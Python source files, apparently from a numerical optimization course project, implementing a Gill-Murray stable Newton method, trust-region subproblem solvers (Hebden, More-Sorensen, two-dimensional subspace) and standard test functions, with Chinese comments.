pt[t] = 1
LT_ = np.linalg.inv(LT)
d = np.dot(pt, LT_)
return d
@with_goto
def GM_newton(X, func, gfunc, hess_func, hyper_parameters=None, zeta=1e-2, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
"""使用Gill Murray稳定牛顿法求极小值点
d = -G_k^{-1} * g_k]
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
zeta ([float], optional): [当gk的模大于zeta, 求解方程得到下降方向]. Defaults to 1e-2.
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
epsilon ([float], optional): [当函数值下降小于epsilon,迭代结束]. Defaults to 1e-5.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
zeta = hyper_parameters["GM_newton"]["zeta"]
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
function_k = 0
k = 1
func_values = [] #记录每一步的函数值,在GLL中有用
mk = 0 #GLL当中的mk初始值
assert epsilon > 0 , "must have epsilon > 0"
# 步2:计算g和G
label .step2
g = gfunc(X)
G = hess_func(X)
# 把当前函数值加入func_values
function_k += 1
F = func(X)
func_values.append(F)
# 步3:对G进行修正Cholesky分解
L, D = utils.modified_Cholesky(G)
modified_G = utils.get_modified_G(L, D)
# 步4, ||g(x)|| > zeta ,解方程计算下降方向
if np.linalg.norm(g) > zeta:
G_1 = np.linalg.inv(modified_G)
d = -np.dot(G_1, g)
goto.step6
# 步5:计算负曲率方向,如果psi>=0则停止,否则求出方向d
LT = copy.deepcopy(L).T
E = modified_G - G
d = negative_curvature(LT, D, E)
if d == None:
logger.info("因为负曲率方向不存在,{mode}的GM稳定牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(mode=search_mode,iter=k, func_k=function_k,X=X,func_X_new=func_X_new))
return X, F, k, function_k
else:
gT = np.mat(g).T
if np.dot(gT, d) > 0:
d = -d
# 步6:线搜索求步长
label .step6
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
else:
raise ValueError("参数search_mode 必须从['ELS', 'ILS']当中选择")
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
if abs(func_X_new - F) <= epsilon:
logger.info("因为函数值下降在{epsilon}以内,{mode}的GM稳定牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(mode=search_mode,epsilon=epsilon, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k
if k > max_epoch:
logger.info("超过最大迭代次数:%d", max_epoch)
return X_new, func_X_new, k, function_k
X = X_new
k += 1
goto .step2
if __name__ == '__main__':
x0 = np.array([-3, -1, -3, -1])
d0 = np.array([2, 1, 2, 1])
diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
G_wood_partial = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
# logger.info("精确线搜索下的阻尼牛顿法")
# X_star, func_X_star, iter_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
# logger.info("非精确线搜索下的阻尼牛顿法")
# X_star, func_X_star, iter_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
logger.info("GLL线搜索下的阻尼牛顿法")
X_star, func_X_star, iter_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
# logger.info("精确线搜索下的GM稳定牛顿法")
# X_star, func_X_star, iter_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
# logger.info("非精确线搜索下的GM稳定牛顿法")
# X_star, func_X_star, iter_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
# logger.info("GLL线搜索下的GM稳定牛顿法")
# X_star, func_X_star, iter_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import copy
from goto import with_goto
from utils import is_pos_def
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def sorensen(X, func, gfunc, hess_func, delta, hyper_parameters=None, v_0=1e-2, epsilon=1e-10, max_epoch=10000):
""" sorensen求解TR子问题
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
delta ([float]): [TR子问题约束中的delta]
hyper_parameters: (Dic): 超参数,超参数中包括:
v_0 ([float]], optional): [v的初值]. Defaults to 1e-2.
epsilon ([float], optional): [解决浮点数相减不精确的问题,用于判等]. Defaults to 1e-10.
max_epoch (int, optional): [description]. Defaults to 1000.
Returns:
[type]: [description]
"""
# 初始化
k = 1
v_k = v_0
I = np.identity(len(X))
G_org = hess_func(X)
G = copy.deepcopy(G_org)
# 先判断G是否正定
if not is_pos_def(G): # G非正定的情况,通过取 v \in {-lambda_n , -2 * lambda_n},使得G正定
values, _vector = np.linalg.eig(G)
values = sorted(values)
lambda_n = values[0]
# v = random.uniform(-lambda_n, -2 * lambda_n)
v_k = - 3 / 2 * lambda_n
G = G + v_k * I
# 和Hebden最大的区别就是在这cholesky分解,用cholesky分解,一是不用次次都求逆,节约了计算量;二是可以用分解出来的结果进行近似迭代
L = np.linalg.cholesky(G)
inv_L = np.linalg.inv(L)
inv_G = inv_L.T @ inv_L
g = gfunc(X)
d_v = - inv_G @ g
if np.linalg.norm(d_v) < delta:
return d_v, k
label.step4
# d_v = - inv_G @ g
q_l = inv_L @ d_v
abs_d_v = np.linalg.norm(d_v)
phi_v = abs_d_v - delta
# 判断终止准则是否成立
if abs(phi_v) <= epsilon:
return d_v, k
if k > max_epoch:
raise Exception("使用sorensen方法求解TR子问题时,超过最大迭代次数:%d", max_epoch)
# 更新v_k
abs_d_v = np.linalg.norm(d_v)
abs_q_l = np.linalg.norm(q_l)
v_k = v_k + ((abs_d_v/abs_q_l) ** 2) * (abs_d_v - delta) / delta
# 重新计算(G+vI)
G = G_org + v_k * I
L = np.linalg.cholesky(G)
inv_L = np.linalg.inv(L)
inv_G = inv_L.T @ inv_L
d_v = - inv_G @ g
k = k + 1
goto.step4
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import time
from goto import with_goto
import utils
import functools
from scipy.sparse.linalg import gmres
from Trust_Region.hebden import hebden
from Trust_Region.sorensen import sorensen
from Trust_Region.two_subspace_min import two_subspace_min
import argparse
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def trust_region_method(X, func, gfunc, hess_func, hyper_parameters=None, TR_method=hebden, delta=0.1, epsilon=1e-9, max_epoch=1000):
"""[ 信赖域算法的主要框架,可选择不同的子问题求解方法
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
TR_method (str, optional): [子问题的求解方法]. Defaults to 'Sorensen'. ['Hebden', 'Sorensen', '二维子空间极小化方法']
epsilon ([float], optional): [||g_k|| < 1e-5 * max(1, ||x_k||)时,迭代结束]. Defaults to 1e-8.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
TR_method = hyper_parameters["TR"]["TR_method"]
delta = hyper_parameters["TR"]["delta"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
n = len(X)
k = 0
TR_iter_k = 0
function_k = 0
start_time = time.time()
label.step2
function_k += 1
F = func(X)
g = gfunc(X)
G = hess_func(X)
# if np.linalg.norm(g) < epsilon:
# logger.info("因为满足终止条件,{mode}方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func}".format(mode=TR_method.__name__, iter=k, func_k=function_k, time=end_time-start_time, X=X,func=F))
# return X, F, k, function_k, TR_iter_k, end_time-start_time
d, add_iter_k = TR_method(X, func, gfunc, hess_func, delta)
TR_iter_k += add_iter_k
end_time = time.time()
function_k += 1
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},求解TR子问题共迭代次数{TR_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,TR_k=TR_iter_k, time=end_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
X_tmp = X + d
F_tmp = func(X_tmp)
if abs(F - F_tmp) < epsilon:
end_time = time.time()
logger.info("因为满足终止条件,{mode}方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},求解TR子问题共迭代次数{TR_k},最终用时{time},最终X={X},最终函数值={func}".format(mode=TR_method.__name__, iter=k, func_k=function_k,TR_k=TR_iter_k, time=end_time-start_time, X=X,func=F))
return X, F, k, function_k, TR_iter_k, end_time-start_time
q_k = -(g @ d + 0.5 * d @ G @ d)
gamma_k = (F - F_tmp) / q_k
# logger.info("F - F_tmp is {}".format(F - F_tmp))
# logger.info("q_k is {}".format(q_k))
# logger.info("gamma_k is {}".format(gamma_k))
if gamma_k >= 0.75 and abs(np.linalg.norm(d) - delta) <= epsilon:
delta = delta * 2
elif gamma_k <= 0.25:
delta = delta / 4
if gamma_k > 0:
X = X_tmp
k = k + 1
goto.step2
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Optimization')
parser.add_argument("--m", type=int, default=100, help="测试函数的维度")
parser.add_argument("--delta", type=float, default=0.5, help="信赖域问题中delta的取值")
parser.add_argument("--test_fucntion", choices=["Wood", "EPS", "Trig", "Penalty1", "EFR", "ER"], type=str, default="EPS", help="测试函数的维度")
args = parser.parse_args()
m = args.m
delta = args.delta
Hebden_hyper_parameters = {
"TR":{
"TR_method": hebden,
"delta": delta,
},
"epsilon": 1e-8,
"max_epoch": 1000,
}
Sorensen_hyper_parameters = {
"TR":{
"TR_method": sorensen,
"delta": delta,
},
"epsilon": 1e-8,
"max_epoch": 1000,
}
TSM_hyper_parameters = {
"TR":{
"TR_method": two_subspace_min,
"delta": delta,
},
"epsilon": 1e-8,
"max_epoch": 1000,
}
if args.test_fucntion == "EPS":
X = np.array([3, -1, 0, 1] * int(m//4))
test_function = functions.EPS(m)
f_funciton = test_function.func
g_function = test_function.gfunc
G_function = test_function.hess_func
write_latex_name = "EPS_{}_delta{}.txt".format(m,delta)
elif args.test_fucntion == "Trig":
X = np.array([1/m] * int(m))
test_function = functions.Trigonometric(m)
f_funciton = test_function.func
g_function = test_function.gfunc
G_function = test_function.hess_func
write_latex_name = "Trig_{}_delta{}.txt".format(m,delta)
elif args.test_fucntion == "Trig":
X = np.array([-3, -1, -3, -1])
f_funciton = functions.wood
diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
g_function = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
G_function = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
write_latex_name = "Wood_delta{}.txt".format(delta)
elif args.test_fucntion == "Penalty1":
X = np.array(range(1, m + 1))
test_function = functions.Penalty1(m)
f_funciton = test_function.func
g_function = test_function.gfunc
G_function = test_function.hess_func
write_latex_name = "Penalty1_{}_delta{}.txt".format(m,delta)
elif args.test_fucntion == "EFR":
X = np.array([-2.] * m)
test_function = functions.Extended_Freudenstein_Roth(m)
f_funciton = test_function.func
g_function = test_function.gfunc
G_function = test_function.hess_func
write_latex_name = "EFR_{}_delta{}.txt".format(m,delta)
elif args.test_fucntion == "ER":
test_function = functions.Extended_Rosenbrock(m)
X = np.zeros(m)
t = np.array(range(int(m / 2)))
X[2 * t] = -1.2
X[2 * t + 1] = 1
f_funciton = test_function.func
g_function = test_function.gfunc
G_function = test_function.hess_func
write_latex_name = "ER_{}_delta{}.txt".format(m,delta)
logger.info("== " * 20 + " {} ".format(write_latex_name) + "== " * 20)
write_latex = open(write_latex_name, 'w')
logger.info("Hebden方法")
X_star, func_X_star, iter_num, function_num, TR_iter_num, cpu_time= trust_region_method(X, f_funciton, g_function, G_function, hyper_parameters=Hebden_hyper_parameters)
write_latex.write(" Hebden & {fx} & {iter_num} & {func_k} & {TR_k} & {cpu_time} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
TR_k = str(TR_iter_num),
cpu_time = round(cpu_time, 4),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("More-Sorensen方法")
X_star, func_X_star, iter_num, function_num, TR_iter_num, cpu_time= trust_region_method(X, f_funciton, g_function, G_function, hyper_parameters=Sorensen_hyper_parameters)
write_latex.write(" More-Sorensen & {fx} & {iter_num} & {func_k} & {TR_k} & {cpu_time} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
TR_k = str(TR_iter_num),
cpu_time = round(cpu_time, 4),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
logger.info("二维子空间极小化")
X_star, func_X_star, iter_num, function_num, TR_iter_num, cpu_time= trust_region_method(X, f_funciton, g_function, G_function, hyper_parameters=TSM_hyper_parameters)
write_latex.write(" 二维子空间极小化 & {fx} & {iter_num} & {func_k} & {TR_k} & {cpu_time} & {is_conv} \\\\ \n".format(
fx = format(func_X_star, ".4e"),
iter_num = str(iter_num),
func_k = str(function_num),
TR_k = str(TR_iter_num),
cpu_time = round(cpu_time, 4),
is_conv = "是" if func_X_star < 1e-5 else "否"
))
--- FILE SEPARATOR ---
import numpy as np
import math
from goto import with_goto
import random
from utils import is_pos_def
from scipy import optimize
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
def two_subspace_min(X, func, gfunc, hess_func, delta, hyper_parameters=None, epsilon=1e-10, max_epoch=10000):
""" 二维子空间极小化方法 求解TR子问题,注意此方法不是迭代方法
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
delta ([float]): [TR子问题约束中的delta]
hyper_parameters: (Dic): 超参数,超参数中包括:
epsilon ([float], optional): [解决浮点数相减不精确的问题,用于判等]. Defaults to 1e-10.
max_epoch (int, optional): [description]. Defaults to 1000.
Returns:
[type]: [description]
"""
k = 0
I = np.identity(len(X))
G = hess_func(X)
# 先判断G是否正定
if not is_pos_def(G): # G非正定的情况,通过取 v \in {-lambda_n , -2 * lambda_n},使得G正定
values, _vector = np.linalg.eig(G)
values = sorted(values)
lambda_n = values[0]
# v = random.uniform(-lambda_n, -2 * lambda_n)
v = - 3 / 2 * lambda_n
G = G + v * I
inv_G = np.linalg.inv(G)
g = gfunc(X)
abs_g = np.linalg.norm(g)
inv_G_g = inv_G @ g
g_tilde = np.array([abs_g**2, g @ inv_G @ g], dtype=float)
G_tilde = np.array(
[[g @ G @ g, abs_g**2 ],
[abs_g**2, g @ inv_G @ g]],
dtype=float)
G_overline = 2 * np.array(
[[abs_g**2, g @ inv_G @ g],
[g @ inv_G @ g, np.linalg.norm(inv_G_g) ** 2]],
dtype=float)
inv_G_tilde = np.linalg.inv(G_tilde)
u_star = - inv_G_tilde @ g_tilde
if 1/2 * (u_star @ G_overline @ u_star) <= delta ** 2:
u = u_star
else:
def fun(x):
input = - np.linalg.inv(G_tilde + x * G_overline) @ g_tilde
return [1/2 * (input @ G_overline @ input) - delta ** 2]
lambda_sol = optimize.root(fun, [0])
lambda_ = float(lambda_sol.x)
u = - np.linalg.inv(G_tilde + lambda_ * G_overline) @ g_tilde
alpha = u[0]
beta = u[1]
d = alpha * g + beta * inv_G_g
return d, k
--- FILE SEPARATOR ---
import numpy as np
import math
import scipy
import sympy
from sympy import diff
from sympy import symbols
import functools
import pickle
from numpy import sin, cos, sum
def wood(X):
"""[wood function]
Args:
X ([np.array]): Input X
Returns:
[float]: funciton values
"""
x1 = X[0]
x2 = X[1]
x3 = X[2]
x4 = X[3]
return sum((
100 * (x1 * x1 - x2)**2,
(x1 - 1)**2,
(x3 - 1)**2,
90 * (x3 * x3 - x4)**2,
10.1 * ((x2 - 1)**2 + (x4 - 1)**2),
19.8 * (x2 - 1) * (x4 - 1),
))
def diff_wood_expression():
"""[wood function的导函数的表达式]
"""
x1, x2, x3, x4 = symbols("x1,x2,x3,x4")
wood_func = 100 * (x1 ** 2 - x2)**2 + (x1 - 1)**2 + (x3 - 1)**2 + 90 * (x3 ** 2 - x4)**2 + 10.1 * ((x2 - 1)**2 + (x4 - 1)**2) + 19.8 * (x2 - 1) * (x4 - 1)
diff_x1 = diff(wood_func, x1)
diff_x2 = diff(wood_func, x2)
diff_x3 = diff(wood_func, x3)
diff_x4 = diff(wood_func, x4)
# return [diif_x1.subs([(x1, X[0]), (x2, X[1]), (x3, X[2]), (x4, X[3])]), diif_x2.subs([(x1, X[0]), (x2, X[1]), (x3, X[2]), (x4, X[3])]), diif_x3.subs([(x1, X[0]), (x2, X[1]), (x3, X[2]), (x4, X[3])]), diif_x4.subs([(x1, X[0]), (x2, X[1]), (x3, X[2]), (x4, X[3])])]
return [diff_x1, diff_x2, diff_x3, diff_x4], (x1, x2, x3, x4)
def g_wood(X, diff_list=None, symbols_list=None):
"""[计算wood函数在X处的一阶导数值]
Args:
X ([np.array]): Input X
diff_list ([list]): 导函数分量列表
symbols_list ([list]): 函数的变量符号列表
Returns:
[float]: wood函数在X出的一阶导数值
"""
if diff_list is not None:
return np.array([diff_xi.subs([(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]) for diff_xi in diff_list], 'float')
def hess_wood_expression():
G = [[] for _ in range(4)]
x1, x2, x3, x4 = sympy.symbols('x1,x2,x3,x4')
wood_func = 100 * (x1 ** 2 - x2)**2 + (x1 - 1)**2 + (x3 - 1)**2 + 90 * (x3 ** 2 - x4)**2 + 10.1 * ((x2 - 1)**2 + (x4 - 1)**2) + 19.8 * (x2 - 1) * (x4 - 1)
gx_1 = sympy.diff(wood_func, x1)
gx_2 = sympy.diff(wood_func, x2)
gx_3 = sympy.diff(wood_func, x3)
gx_4 = sympy.diff(wood_func, x4)
Gx_11 = sympy.diff(gx_1, x1)
Gx_12 = sympy.diff(gx_1, x2)
Gx_13 = sympy.diff(gx_1, x3)
Gx_14 = sympy.diff(gx_1, x4)
Gx_22 = sympy.diff(gx_2, x2)
Gx_23 = sympy.diff(gx_2, x3)
Gx_24 = sympy.diff(gx_2, x4)
Gx_33 = sympy.diff(gx_3, x3)
Gx_34 = sympy.diff(gx_3, x4)
Gx_44 = sympy.diff(gx_4, x4)
G[0].extend([Gx_11, Gx_12, Gx_13, Gx_14])
G[1].extend([Gx_12, Gx_22, Gx_23, Gx_24])
G[2].extend([Gx_13, Gx_23, Gx_33, Gx_34])
G[3].extend([Gx_14, Gx_24, Gx_34, Gx_44])
return G, (x1, x2, x3, x4)
def G_wood(X, G_lists=None, symbols_list=None):
"""[计算wood函数在X处的Hess矩阵值]
Args:
X ([np.array]): Input X
G_list ([list]): hess矩阵表达式分量二维列表
symbols_list ([list]): 函数的变量符号列表
Returns:
[float]: wood函数在X出的一阶导数值
"""
if G_lists is not None:
return np.array([[G_xi.subs([(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]) for G_xi in G_list] for G_list in G_lists], 'float')
def g_function(X, diff_list=None, symbols_list=None):
""" 输入一阶导数的符号表达式,计算一阶导数值
Args:
X ([np.array]): Input X
diff_list ([list]): 导函数表达式分量列表
symbols_list ([list]): 函数的变量符号列表
Returns:
[float]: 输出在X处的一阶导数值
"""
if diff_list is not None:
return np.array([diff_xi.subs([(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]) for diff_xi in diff_list], 'float')
def hess_expression(m, diff_list=None, symbols_list=None):
""" 输入一阶导数的符号表达式,计算hess矩阵的符号表达式
Args:
X ([np.array]): Input X
diff_list ([list]): 导函数表达式分量列表
symbols_list ([list]): 函数的变量符号列表
Returns:
hess矩阵的符号表达式
"""
G = [[] for _ in range(m)]
for i in range(m):
for j in range(i+1):
G[i].append(sympy.diff(diff_list[i], symbols_list[j]))
for j in range(m):
for i in range(j+1,m):
G[j].append(G[i][j])
return G, symbols_list
def G_function(X, G_lists=None, symbols_list=None):
""" 输入hess矩阵的符号表达式,计算hess矩阵
Args:
X ([np.array]): Input X
G_lists ([list]): hess矩阵的符号表达式
symbols_list ([list]): 函数的变量符号列表
Returns:
[[np.array]]: 输出在X处的hess矩阵值
"""
if G_lists is not None:
return np.array([[G_xi.subs([(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]) for G_xi in G_list] for G_list in G_lists], 'float')
class Wood:
def __init__(self, n):
self.n = n
def func(self, X):
x1 = X[0]
x2 = X[1]
x3 = X[2]
x4 = X[3]
return sum((
100 * (x1 * x1 - x2)**2,
(x1 - 1)**2,
(x3 - 1)**2,
90 * (x3 * x3 - x4)**2,
10.1 * ((x2 - 1)**2 + (x4 - 1)**2),
19.8 * (x2 - 1) * (x4 - 1),
))
class EPS:
def __init__(self, n):
assert n % 4 == 0, "Len of X must be a multiple of 4"
self.n = n
def func(self, X):
return sum(
(sum(((X[idx] + 10 * X[idx + 1])**2,
5 * (X[idx+2] - X[idx+3])**2,
(X[idx+1] - 2 * X[idx+2])**4,
10 * (X[idx] - X[idx+3])**4,
)) for idx in range(0, len(X), 4)))
def gfunc(self, X):
""" 输入X,手动计算EPS的一阶导数
Args:
X ([np.array]): Input X
Returns:
[[np.array]]: 输出在X处的
"""
m = len(X)
assert m % 4 == 0 # m should be exactly divisible by 4
g = np.zeros(m)
for iter in range(0, int(m / 4)):
g[4 * iter] = 2 * (X[4 * iter] + 10 * X[4 * iter + 1]) + 40 * math.pow(
X[4 * iter] - X[4 * iter + 3], 3)
g[4 * iter + 1] = 20 * (X[4 * iter] + 10 * X[4 * iter + 1]) + 4 * math.pow(
X[4 * iter + 1] - 2 * X[4 * iter + 2], 3)
g[4 * iter + 2] = 10 * (X[4 * iter + 2] - X[4 * iter + 3]) - 8 * math.pow(X[4 * iter + 1] - 2 * X[4 * iter + 2],
3)
g[4 * iter + 3] = -10 * (X[4 * iter + 2] - X[4 * iter + 3]) - 40 * math.pow(X[4 * iter] - X[4 * iter + 3],
3)
return g
def hess_func(self, X):
""" 输入X,手动计算EPS的hess矩阵
Args:
X ([np.array]): Input X
Returns:
[[np.array]]: 输出在X处的hess矩阵值
"""
m = len(X)
assert m % 4 == 0 # m should be exactly divisible by 4
G = np.zeros((m, m))
for iter in range(0, int(m / 4)):
x1 = X[4 * iter]
x2 = X[4 * iter + 1]
x3 = X[4 * iter + 2]
x4 = X[4 * iter + 3]
G[4 * iter][4 * iter] = 2 + 120 * (x1 - x4) ** 2
G[4 * iter][4 * iter + 1] = 20
G[4 * iter][4 * iter + 3] = -120 * (x1 - x4) ** 2
G[4 * iter + 1][4 * iter] = 20
G[4 * iter + 1][4 * iter + 1] = 200 + 12 * (x2 - 2 * x3) ** 2
G[4 * iter + 1][4 * iter + 2] = -24 * (x2 - 2 * x3) ** 2
G[4 * iter + 2][4 * iter + 1] = G[4 * iter + 1][4 * iter + 2]
G[4 * iter + 2][4 * iter + 2] = 10 + 48 * (x2 - 2 * x3) ** 2
G[4 * iter + 2][4 * iter + 3] = -10
G[4 * iter + 3][4 * iter] = G[4 * iter][4 * iter + 3]
G[4 * iter + 3][4 * iter + 2] = G[4 * iter + 2][4 * iter + 3]
G[4 * iter + 3][4 * iter + 3] = 10 + 120 * (x1 - x4) ** 2
return G
class Trigonometric:
def __init__(self, n):
self.n = n
def func(self, X):
n = len(X)
sum_cos = sum((math.cos(x) for x in X))
return sum(
( (n - sum_cos + (idx + 1) * (1 - math.cos(x)) - math.sin(x)) ** 2 for idx, x in enumerate(X))
)
def gfunc(self, X):
""" 输入X,手动计算trigonometric的一阶导数
Args:
X ([np.array]): Input X
Returns:
[[np.array]]: 输出在X处的一阶导数值
"""
n = len(X)
X0 = X.reshape(-1,1)
one = np.array([i + 1 for i in range(n)]).reshape(-1, 1)
constant = n - sum(cos(X0))
gamma = constant + one * (1 - cos(X0)) - sin(X0)
gamma_sum = sum(constant + one * (1 - cos(X0)) - sin(X0))
g = 2 * gamma * (one * sin(X0) - cos(X0)) + 2 * sin(X0) * gamma_sum
return g.reshape(n)
def hess_func(self, X):
""" 输入X,手动计算trigonometric的hess矩阵
Args:
X ([np.array]): Input X
Returns:
[[np.array]]: 输出在X处的hess矩阵值
"""
n = len(X)
X0 = X.reshape(-1,1)
constant = n - sum(cos(X))
one = np.array([i + 1 for i in range(n)]).reshape(-1, 1)
gamma_sum = sum(constant + one * (1 - cos(X0)) - sin(X0))
diag = 2 * (sin(X0) + one * sin(X0) - cos(X0)) * (one * sin(X0) -cos(X0)) + 2 * (constant + one * (1 - cos(X0)) - sin(X0)) * \
(one * cos(X0) + sin(X0)) + 2 * cos(X0) * gamma_sum + 2 * sin(X0) * \
(n * sin(X0) + one * sin(X0) - cos(X0))
diag = diag.reshape(-1)
G = 2 * np.matmul((one * sin(X0) - cos(X0)), sin(X0).T) + 2 * np.matmul(sin(X0), (n * sin(X0) + one * sin(X0) - cos(X0)).T)
for i in range(n):
G[i][i] = diag[i]
return G
class Penalty1:
"""
重构代码,把同一个测试方程的func,gfunc,hess_func归为一个类
"""
def __init__(self, n, a=1e-5):
self.n = n
self.m = n + 1
self.a = a
def func(self, X):
"""Penalty1 的函数
Args:
X ([np.array]): 要求输入是numpy.array,方便进行矩阵运算
"""
X = X.reshape(-1,1)
one_col = np.ones((self.n, 1))
return (self.a * np.matmul((X - one_col).T, X - one_col) + (np.matmul(X.T, X) - 1/4) ** 2)[0][0]
def gfunc(self, X):
X = X.reshape(-1,1)
one_col = np.ones((self.n, 1))
g = 2 * self.a * (X - one_col) + 4 * (np.matmul(X.T, X) - 1/4) * X
return g.reshape(self.n)
def hess_func(self, X):
X = X.reshape(-1,1)
E = np.identity(self.n)
one_col = np.ones((self.n, 1))
G = 2 * self.a * E + 4 * (np.matmul(X.T, X) - 1 /4) * E + 8 * np.matmul(X, X.T)
return G
class Extended_Freudenstein_Roth:
def __init__(self, n):
assert n % 2 == 0, "n must be even"
self.n = n
self.m = n - 1
def func(self, X):
f = 0
for i in range(self.m):
f += ((X[i] + X[i+1] * ((5 - X[i+1]) * X[i+1] - 2) - 13) ** 2 + (X[i] + X[i+1] * ((X[i+1] + 1) * X[i+1] - 14) - 29) ** 2)
# for i in range(int(self.n / 2)):
# f += ((X[2 * i] + X[2*i + 1] * ((5 - X[2*i+1]) * X[2*i+1] - 2) - 13) ** 2 + (X[2*i] + X[2*i+1] * ((X[2*i+1] + 1) * X[2*i+1] - 14) - 29) ** 2)
return f
def gfunc(self, X):
g = np.zeros(self.n)
g[0] = 4 * X[0] + 12 * X[1] ** 2 - 32 * X[1] - 84
g[self.n - 1] = (-6 * X[self.n - 1] ** 2 + 20 * X[self.n - 1] - 4) * (X[self.n - 2] - X[self.n - 1] ** 3 + 5 * X[self.n - 1] ** 2 - 2 * X[self.n - 1] - 13) + \
(6 * X[self.n - 1] ** 2 + 4 * X[self.n - 1] - 28) * (X[self.n - 2] + X[self.n - 1] ** 3 + X[self.n - 1] ** 2 - 14 * X[self.n - 1] - 29)
for i in range(1, self.n - 1):
